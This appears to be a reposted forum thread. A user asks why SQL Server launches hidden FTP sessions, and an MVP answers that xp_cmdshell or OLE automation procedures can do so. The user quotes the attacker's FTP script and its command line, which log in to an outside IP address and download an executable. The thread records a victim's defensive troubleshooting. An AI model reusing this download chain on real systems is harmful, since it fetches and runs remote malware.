Wednesday, March 28, 2012

malicious process...

Hi,
Since I installed a firewall on my machine, it regularly=20
detects unexpected ftp sessions.
Thanks to a process explorer, I remarked that ftp is=20
launched from a (hidden) cmd.exe, itself lauched by=20
sql.exe (for your info, the ftp command line is : "ftp -n -
s:?.txt" where ?.txt is a textfile in \system32\ ).
What SQL subsystem is able to launch such a process? a=20
stored procedure? a trigger? (fyi, SQLAgent is not=20
running). How can I prevent this to occur?
Thank you for your help,
Fran=E7ois
Note - contents of the textfile :
=20
open 81.244.183.229 19470 =20
user itqavjflw itqavjflw =20
get SCardClnt.exe =20
quit =20Hi
xp_cmdshell or xp_oa* are capable of doing this.
Regards
--
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland
MVP Program: http://www.microsoft.com/mvp
Blog: http://www.msmvps.com/epprecht/
"Fran?ois G." wrote:

> Hi,
> Since I installed a firewall on my machine, it regularly
> detects unexpected ftp sessions.
> Thanks to a process explorer, I remarked that ftp is
> launched from a (hidden) cmd.exe, itself lauched by
> sql.exe (for your info, the ftp command line is : "ftp -n -
> s:?.txt" where ?.txt is a textfile in \system32\ ).
> What SQL subsystem is able to launch such a process? a
> stored procedure? a trigger? (fyi, SQLAgent is not
> running). How can I prevent this to occur?
> Thank you for your help,
> Fran?ois
>
> Note - contents of the textfile :
> open 81.244.183.229 19470
> user itqavjflw itqavjflw
> get SCardClnt.exe
> quit
>

No comments:

Post a Comment